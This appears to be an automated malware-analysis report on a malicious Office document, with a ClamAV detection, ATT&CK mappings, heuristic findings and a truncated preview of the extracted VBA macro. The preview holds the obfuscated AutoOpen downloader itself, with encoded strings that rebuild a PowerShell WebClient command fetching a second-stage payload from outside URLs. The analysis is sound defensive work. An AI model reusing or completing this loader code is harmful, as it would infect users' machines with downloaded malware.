MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate or Obfuscate Malicious Code
The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate the presence of an auto-executing loader that uses Shell() calls and custom decoding. The primary function of the script appears to be downloading and executing a second-stage payload from a URL that is partially reconstructed from concatenated strings.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6448733-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6448733-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23928 bytes |
SHA-256: d16c95d66b098c687837c632d774dce5dafbe87981588802f1b99c58c2fb7218 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aiNiCfrApT"
Function NilCSnTOVHMwK()
On Error Resume Next
owdYRmm = (wrkjm - Int(uutrvYwRWwBJLZ) * zfFBMWMIi / Oct(pOhULG) - (wkSafsUrDT - Sin(9032657)))
OLIWFUI = (HKnsiw - Int(ffZZhlL) * FJRwKrYKaGw / Oct(mkJJCRCa) - (BVCYzbwYLkoUKO - Sin(6457550)))
wnQSWfVuRuo = (XkOjzMlhbYuV - Int(XQjkjDoO) * LQamPVIAc / Oct(cYfhorzpj) - (wajcInUFj - Sin(5179867)))
wYquM = (PBkREJTwR) + HJjkJKD("IKKZnKoWNf8+Nf8RENf8+Nf8xBR6uK8+uK8'+'/?htNf8+Nf8tp:/pv2+pv2/Nf8+Nf8www.socNf8+Nf8iNf8zItPZjLPXYjFBkEptRmqbOwkYwiYsi", 9, 78)
uzcNl = (bkjzdbBDQBLiB - Int(IqhlsUwViIj) * vmKqqwpd / Oct(oOMkVOVKu) - (LqLaELz - Sin(4323733)))
ZRVrm = (zFGaOMfPtaK - Int(tXIUbVB) * FaLjwYakL / Oct(frZFjS) - (owXpzckkwRT - Sin(546714)))
cqupBTwPKPh = (cpwziX - Int(XipmvDnuTpnrq) * nXdhGzbzzGHh / Oct(cptZaJ) - (KJIltwppQ - Sin(1363550)))
GXzvXnoiN = (PZawYtrrivtkOE) + HJjkJKD("zKNLAce(Nf8JskNf8,[sTrIng][cHaR]39)) pv2)uK8+uK8.rePlacE(pv2Nf8pv2,[sTRInG][CHar]39).rePlacE(([CHar]116+[CHaruK8+uK8]uK8+uK854+[CHar]113)'+',[sTRInG][CHaSHZlQPzz", 4, 150)
Vuhbw = (SbdPrnJHlis - Int(fVmnYYHCjF) * fYGfzdkqrRtt / Oct(LCdfOSjomHztK) - (jBIKzMowq - Sin(7033970)))
RjIuzkUoNb = (KiBsBK - Int(bvbVvcnQZwtR) * moFDoi / Oct(uhDNLs) - (DofwkzNRP - Sin(9317622)))
ijiLnqsp = (GjWimpF - Int(cVWYzESDq) * rOKCFkcuCITuU / Oct(JshCkMuNH) - (PBhPhrSuWYXh - Sin(201825)))
hKnzOp = (ijiOzLEaQM) + HJjkJKD("LbcHaR]54),[sTrIng][cHaAcvBHtAXZVwvHrPRPF", 3, 21)
ZKTUL = (DCNNKqZXwCbr - Int(bzHCZKjhAl) * cUBbs / Oct(tadRXksfd) - (fLEtnN - Sin(8810826)))
NoHHGbAJM = (VWwDwrFDQMkqo - Int(iXIAOLDNPXwDAV) * rNPaLGWcpilLUT / Oct(umShhhlmwhl) - (HZHtqk - Sin(1430390)))
Ekpld = (zUPdsHvSW - Int(AjujcKlTnO) * aQsZwP / Oct(ilvbM) - (jZWooZlSQVhCN - Sin(4461011)))
Gmworjn = (FiBwOEXQSdzdHX) + HJjkJKD("VJ+uK8f8+Nf8Jsk+JNf8+NfuK8+u'+'K88skeJskpv2+uK8+u'+'K8pv2+Nf8+NuK8+uK8f8Jpv2+uzHRmZsBsVn", 3, 76)
QBBTJCl = (vKXlsFl - Int(YfTbHVzluh) * jioJfNTvJLriQ / Oct(NIMjIAnzII) - (DYvjnKkjjEjGB - Sin(8429597)))
crocEE = (YJbRhwDwu - Int(nFmhFlW) * PcpYOWAGBja / Oct(CLolbdVqbwz) - (BTAFwzdTJb - Sin(7218485)))
JozEbIlOX = (iAvFRav - Int(WMLbQBFbP) * ETcNWvWuICC / Oct(YaZYDb) - (QZABcFpIYpz - Sin(8735314)))
CWsKABHjjP = (hYWzDCnwfOcn) + HJjkJKD("PqKlmExNf8+Nf8wnNf'+'8+Nf8sNf8+Nf8adasdNfpv2+pv28+uK8+uK8'+'Nf8 '+'= &(Jspv2+pv2Nf8+Nf8knNuK8JXullN", 7, 87)
qsYDBsLj = (rzisw - Int(DRAIhn) * FLJADuDHmiwjhC / Oct(IHpBXVzzPJE) - (TAlLvLlQG - Sin(6835758)))
iHOKQSs = (MtjvFPfJ - Int(EUIsTjPc) * MtqwXj / Oct(AXDXwl) - (ZncIraskjA - Sin(7562250)))
BjihzEAtdml = (zrtrPwII - Int(pdOVwoErclVSs) * EqXXBPbKqKF / Oct(PHfnbndhjKOn) - (mnsHOSAHIoBrYH - Sin(8690341)))
CEWQcd = (dzjWRsUPnk) + HJjkJKD("VimbuzjTEwDf8uK8+uK8+Nf8u/XEZ8sF/JskNfpv2+pv28+Nf8.SplNpv2'+'+pv2f'+'8+Nf8it(JsuK8+uK8k?JsuK8+uK8k)Nf8+Nf8;3Nf8+Nf8xw'+'SDC =Nf8+NfuK8+uK88 3xwNf8+Npv2+pv'+'2f8env'zjBAjB", 12, 153)
FXrJGJCSUzk = (sEdGSivDfj - Int(DYLXjNq) * SEkLzIuZHvs / Oct(jdJKKiSi) - (sHBFvwUQMtB - Sin(7167638)))
BRhufLAkEqt = (kYHtf - Int(YFoHnSfaPAMAuM) * ZzjGBMZIvBrjht / Oct(CRCTGcEzOmQV) - (QztGZD - Sin(1967634)))
VKuqOL = (YnimwwsFvm - Int(hdzvzbGWVzUTlq) * rvIkHdiJ / Oct(iYjHfLtSAS) - (bSDvfSjpdDTs - Sin(9243709)))
idTJuBHS = (KhpKztckcObjC) + HJjkJKD("mnKlazmf8+Nf8suK8+uK8kpv2+pv2-Nf8+Nf8objNf8+Nf8ectJ'+'sk)Nf8+pv2+pvuK8+uK82Nf8 SNf8+Nf8pv2+pv2ystem.Net.N'+'uK8+uK8f8+Nf8wTKlkqajJtjKidCpZmXIXE", 8, 114)
MNbuzAM = (sMFoztjaK - Int(kdaPvHUwoHz) * XkUpfZBzYtmj / Oct(kFrWF) - (sHsJVRuIvzVO - Sin(6949187)))
lOvii = (GpVTINGZL - Int(rqtKLB) * bjUGifawYl / Oct(GADiCGwv) - (XOrhTvkSiXjz - Sin(8751392)))
zziwa = (tiQSbJuUk - Int(pSKEMomMPR) * Nrmmiu / Oct(TACTMi) - (zmnWlq - Sin(501135)))
JZipY = (uwrJECTTCs) + HJjkJKD("LzjFRrra.com/1RurEqNf8+Nf8F/Nf8+Nf8?httuK8+'+'uK8p://mNf8+Nf8cfNf8+Nf821.ruK8+uK8uNuK8+uK8f8+Npv2+pv2f8pv2+pv2/LaZEJ", 7, 106)
Jmqt
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.